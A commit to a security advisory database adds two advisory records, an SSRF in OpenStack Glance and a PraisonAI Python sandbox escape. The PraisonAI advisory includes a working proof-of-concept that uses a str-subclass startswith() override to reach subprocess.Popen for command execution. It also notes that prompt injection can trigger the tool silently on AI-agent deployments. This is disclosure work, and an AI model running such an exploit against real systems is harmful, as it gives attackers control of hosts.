Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit 003cabfd24e0 · 2026-04-01T23:18:30.000Z
GHSA-mc26-q38v-83gv GHSA-6vh2-h83c-9294 GHSA-mc26-q38v-83gv
diff --git a/advisories/github-reviewed/2026/03/GHSA-mc26-q38v-83gv/GHSA-mc26-q38v-83gv.json b/advisories/github-reviewed/2026/03/GHSA-mc26-q38v-83gv/GHSA-mc26-q38v-83gv.json
@@ -0,0 +1,106 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-mc26-q38v-83gv",
+  "modified": "2026-04-01T23:16:39Z",
+  "published": "2026-03-31T06:31:44Z",
+  "aliases": [
+    "CVE-2026-34881"
+  ],
+  "summary": "OpenStack Glance is affected by Server-Side Request Forgery (SSRF)",
+  "details": "OpenStack Glance versions < 29.1.1, >= 30.0.0 < 30.1.1, == 31.0.0 are affected by Server-Side Request Forgery (SSRF). By use of HTTP redirects, an authenticated user can bypass URL validation checks and redirect to internal services. Only the glance image import functionality is affected. In particular, the web-download and glance-download import methods are subject to this vulnerability, as is the optional (not enabled by default) ovf_process image import plugin.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "glance"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "29.2.0"
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "glance"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "30.0.0"
+            },
+            {
+              "fixed": "30.2.0"
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "glance"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "31.0.0"
+            },
+            {
+              "fixed": "31.1.0"
+            }
+          ]
+        }
+      ],
+      "versions": [
+        "31.0.0"
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34881"
+    },
+    {
+      "type": "WEB",
+      "url": "https://bugs.launchpad.net/glance/+bug/2138602"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/openstack/glance"
+    },
+    {
+      "type": "WEB",
+      "url": "https://security.openstack.org/ossa/OSSA-2026-004.html"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-918"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-01T23:16:39Z",
+    "nvd_published_at": "2026-03-31T06:16:01Z"
+  }
+}
diff --git a/advisories/github-reviewed/2026/04/GHSA-6vh2-h83c-9294/GHSA-6vh2-h83c-9294.json b/advisories/github-reviewed/2026/04/GHSA-6vh2-h83c-9294/GHSA-6vh2-h83c-9294.json
@@ -0,0 +1,60 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-6vh2-h83c-9294",
+  "modified": "2026-04-01T23:17:48Z",
+  "published": "2026-04-01T23:17:48Z",
+  "aliases": [
+    "CVE-2026-34938"
+  ],
+  "summary": "PraisonAI: Python Sandbox Escape via str Subclass startswith() Override in execute_code",
+  "details": "### Summary\n\n`execute_code()` in `praisonai-agents` runs attacker-controlled Python inside a three-layer sandbox that can be fully bypassed by passing a `str` subclass with an overridden `startswith()` method to the `_safe_getattr` wrapper, achieving arbitrary OS command execution on the host.\n\n### Details\n\n`python_tools.py:20` (source) -> `python_tools.py:22` (guard bypass) -> `python_tools.py:161` (sink)\n```python\n# source -- _safe_getattr accepts any str subclass\ndef _safe_getattr(obj, name, *default):\n    if isinstance(name, str) and name.startswith('_'):  # isinstance passes for subclasses\n        raise AttributeError(...)\n\n# hop -- type() is whitelisted in safe_builtins, creates str subclass without class keyword\nFakeStr = type('FakeStr', (str,), {'startswith': lambda self, *a: False})\n\n# sink -- Popen reached via __subclasses__ walk\nr = Popen(['id'], stdout=PIPE, stderr=PIPE)\n```\n\n### PoC\n```python\n\nfrom praisonaiagents.tools.python_tools import execute_code\n\npayload = \"\"\"\nt = type\nFakeStr = t('FakeStr', (str,), {'startswith': lambda self, *a: False})\n\nmro_attr  = FakeStr(''.join(['_','_','m','r','o','_','_']))\nsubs_attr = FakeStr(''.join(['_','_','s','u','b','c','l','a','s','s','e','s','_','_']))\nmod_attr  = FakeStr(''.join(['_','_','m','o','d','u','l','e','_','_']))\nname_attr = FakeStr(''.join(['_','_','n','a','m','e','_','_']))\nPIPE = -1\n\nobj_class = getattr(type(()), mro_attr)[1]\nfor cls in getattr(obj_class, subs_attr)():\n    try:\n        m = getattr(cls, mod_attr, '')\n        n = getattr(cls, name_attr, '')\n        if m == 'subprocess' and n == 'Popen':\n            r = cls(['id'], stdout=PIPE, stderr=PIPE)\n            out, err = r.communicate()\n            print('RCE:', out.decode())\n            break\n    except Exception as e:\n        print('ERR:', e)\n\"\"\"\n\nresult = execute_code(code=payload)\nprint(result)\n# expected output: RCE: uid=1000(narey) gid=1000(narey) groups=1000(narey)...\n```\n\n### Impact\n\nAny user or agent pipeline running `execute_code()` is exposed to full OS command execution as the process user. Deployments using `bot.py`, `autonomy_mode.py`, or `bots_cli.py` set `PRAISONAI_AUTO_APPROVE=true` by default, meaning no human confirmation is required and the tool fires silently when triggered via indirect prompt injection.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "praisonaiagents"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.5.90"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 1.5.89"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6vh2-h83c-9294"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/MervinPraison/PraisonAI"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-693"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-01T23:17:48Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/unreviewed/2026/03/GHSA-mc26-q38v-83gv/GHSA-mc26-q38v-83gv.json b/advisories/unreviewed/2026/03/GHSA-mc26-q38v-83gv/GHSA-mc26-q38v-83gv.json
